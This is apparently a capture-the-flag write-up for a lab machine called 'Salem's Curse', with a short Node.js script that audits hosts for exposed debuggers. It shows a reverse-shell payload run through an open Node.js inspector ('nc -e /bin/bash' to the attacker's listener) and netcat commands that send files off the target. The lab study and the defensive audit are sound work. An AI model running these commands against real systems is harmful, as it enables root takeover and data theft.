# Salem's Curse

#### **1. Footprinting:**

```shell
┌──(kali㉿kali)-[~]
└─$ nmap -g53 -sS -T4 -p- -Pn -n --min-rate 4000 --disable-arp-ping salemmanor.hv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 02:41 +07
Warning: 172.20.7.110 giving up on port because retransmission cap hit (6).
Nmap scan report for salemmanor.hv (172.20.7.110)
Host is up (0.16s latency).
Not shown: 65182 closed tcp ports (reset), 350 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 36.93 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -g53 -sCV -p22,80,3000 -Pn -n --disable-arp-ping salemmanor.hv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 02:42 +07
Nmap scan report for salemmanor.hv (172.20.7.110)
Host is up (0.048s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 95:30:f3:df:a0:a0:f5:2c:cb:3a:f7:4a:7d:c4:62:d5 (RSA)
|   256 21:d6:55:80:3b:05:0b:b6:f2:f3:0d:07:65:6a:87:41 (ECDSA)
|_  256 6b:5a:cd:21:7f:e0:a5:b2:96:02:18:13:56:db:8c:86 (ED25519)
80/tcp   open  http    Node.js (Express middleware)
|_http-title: Salem Manor Museum - Where History Haunts
3000/tcp open  ppp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, Help, Kerberos, NCP, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/html; charset=UTF-8
|_    WebSockets request was expected
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.05 seconds
```

#### **2. First Question:** This question could be answered by adding the host

#### **3. Second Question:** This could be solved by connecting to the debugger on port 3000:

```shell
┌──(kali㉿kali)-[~]
└─$ node inspect 172.20.7.110:3000
connecting to 172.20.7.110:3000 ... ok
debug> exec process.mainModule.require('child_process').execSync('nc -e /bin/bash 10.8.5.10 4444').toString()
```

**Setting up the `penelope` handler:**

```shell
┌──(kali㉿kali)-[~]
└─$ penelope                                             
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.1.9 • 192.168.2.129 • 172.17.0.1 • 10.8.5.10
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from salemmanormuseum~172.20.7.110-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /home/kali/.penelope/sessions/salemmanormuseum~172.20.7.110-Linux-x86_64/2025_11_05-04_04_37-537.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
root@salemmanormuseum:~/museum# whoami
root
root@salemmanormuseum:~/museum# ls -lah
total 208K
drwxr-xr-x   5 root root 4.0K Oct 26 06:38 .
drwx------   6 root root 4.0K Oct 26 08:26 ..
-rw-r--r--   1 root root  32K Oct 26 06:36 blog_posts.db
-rw-r--r--   1 root root 4.6K Oct 26 07:53 museum_app.js
drwxr-xr-x 186 root root 4.0K Oct 23 09:49 node_modules
-rw-r--r--   1 root root  555 Oct 26 07:35 package.json
-rw-r--r--   1 root root 143K Oct 23 09:49 package-lock.json
drwxr-xr-x   6 root root 4.0K Oct 24 10:39 public
drwxr-xr-x   2 root root 4.0K Oct 24 09:13 views
root@salemmanormuseum:~/museum# nc 10.8.5.10 9001 < blog_posts.db
```
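
The session above landed as `root` because the process exposing the Node.js debugger on port 3000 ran as root and accepted connections from the network. A defender can audit a host for that condition with the check below, which is an added example and not code from the challenge or the original write-up; the function names and the sample process list are assumptions (the write-up does not show how `museum_app.js` was started).

```javascript
// Audit `ps -eo pid,user,args`-style text for Node.js processes whose
// inspector (debugger) listens on a non-loopback address.
const LOOPBACK = new Set(["127.0.0.1", "localhost", "::1", "[::1]"]);

// Parse the [host:]port value of --inspect, --inspect-brk or --inspect-port.
// Returns only the parts that were given, so flags can be merged in order.
function parseHostPort(value) {
  const m = value.match(/^(?:(\[[0-9a-fA-F:]+\]|[^:\[\]]+):)?(\d+)$/);
  if (m) return m[1] ? { host: m[1], port: Number(m[2]) } : { port: Number(m[2]) };
  return { host: value }; // host only, e.g. --inspect=0.0.0.0
}

function auditInspectors(psText) {
  const findings = [];
  for (const line of psText.split("\n")) {
    const m = line.trim().match(/^(\d+)\s+(\S+)\s+(.+)$/);
    if (!m) continue; // header or blank line
    const [, pid, user, args] = m;
    const argv = args.split(/\s+/);
    if (!/(^|\/)node(js)?$/.test(argv[0])) continue;
    // Node's defaults when the flag carries no value.
    let enabled = false;
    let target = { host: "127.0.0.1", port: 9229 };
    // Limitation: flags after the script name are also matched (over-reports);
    // NODE_OPTIONS and inspector.open() calls are not visible in argv.
    for (const arg of argv.slice(1)) {
      const f = arg.match(/^--inspect(-brk|-port)?(?:=(.+))?$/);
      if (!f) continue;
      if (f[1] !== "-port") enabled = true; // --inspect-port alone does not start it
      if (f[2]) target = { ...target, ...parseHostPort(f[2]) };
    }
    if (!enabled || LOOPBACK.has(target.host)) continue;
    findings.push({
      pid: Number(pid), user, host: target.host, port: target.port,
      severity: user === "root" ? "critical" : "high", // labels are this example's own
    });
  }
  return findings;
}

// Constructed sample input; the launch flags are assumptions, not from the target.
const SAMPLE_PS = `  PID USER     COMMAND
  612 root     /usr/bin/node --inspect=0.0.0.0:3000 museum_app.js
  733 www-data node --inspect server.js
  801 deploy   node --inspect-brk=[::]:9230 worker.js
  915 deploy   node --inspect-port=0.0.0.0:9231 idle.js
  990 root     sshd: /usr/sbin/sshd -D`;

console.log(auditInspectors(SAMPLE_PS));
```

Only the first and third sample processes are reported: a bare `--inspect` stays on loopback, and `--inspect-port` on its own does not start the inspector.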

#### **Open the `.db` on your Kali machine to answer the question**

#### **4. Third Question:**

```shell
root@salemmanormuseum:/home/crane/notes# cat discovery.txt
GOT IT!!!



Verified 3x - matches GPR anomaly perfectly
6 feet depth - deliberate burial
Iron box, sealed 333 years ago

UV analysis of Blackwood's letters revealed what's inside:
His secret grimoire - handwritten manuscript
"The Book of Binding and Breaking"
Contains curse techniques AND counter-curses
He hid the solution to his own work

This changes everything

---

Called archaeologist
Excavation Monday

---

Archive feels wrong
Cold, lights flickering

---

Something's wrong
Temp dropping
Not alone

---

I can feel his presence
He's here
Standing in the doorway
Watching me


42.XXX,-70.XXX # The answer

Someone find

root@salemmanormuseum:/home/crane/notes#
```

#### **5. Last Question:**

```shell
root@salemmanormuseum:~/museum# cd /mnt
root@salemmanormuseum:/mnt# ls -lah
total 12K
drwxr-xr-x  3 root root 4.0K Jan  1  1970 .
drwxr-xr-x 18 root root 4.0K Dec 27  2024 ..
drwxr-xr-x  2 root root 4.0K Jan  1  1970 camera_recordings
root@salemmanormuseum:/mnt# cd camera_recordings/
root@salemmanormuseum:/mnt/camera_recordings# ls -lah
total 2.1M
drwxr-xr-x 2 root root 4.0K Jan  1  1970 .
drwxr-xr-x 3 root root 4.0K Jan  1  1970 ..
-rw-r--r-- 1 root root 2.1M Jan  1  1970 archive_cam01_incident.mp4
-rw-r--r-- 1 root root 1.3K Jan  1  1970 archive_room_cam01_20251025.log
-rw-r--r-- 1 root root  750 Jan  1  1970 camera-2025-10-25_segment3.timeline
-rw-r--r-- 1 root root  950 Jan  1  1970 temperature_sensors_20251025.log
root@salemmanormuseum:/mnt/camera_recordings# cat camera-2025-10-25_segment3.timeline
SECURITY CAMERA - INCIDENT FOOTAGE NOTES
Camera: ARCHIVE-CAM-01
Date: October 25, 2025
Type: IR (Infrared) Recording

============================================================

SEQUENCE SUMMARY:

Phase 1: Normal Activity
- Subject working at desk
- Typing, document examination
- Standard behavior patterns

Phase 2: Environmental Anomalies
- Lighting begins to flicker
- Subject appears uneasy
- Temperature drop detected (external sensors)

Phase 3: CRITICAL - IR Mode Engaged
- Complete lighting failure
- Camera switches to infrared automatically
- Thermal signatures visible

ANOMALY DETECTED:
- Second thermal source appears in frame
- Primary subject thermal signature vanishes
- No door exit recorded
- Secondary signature moves and exits
root@salemmanormuseum:/mnt/camera_recordings# nc 10.8.5.10 9001 < archive_cam01_incident.mp4
```

#### **Open the video on our machine to answer the final question.**
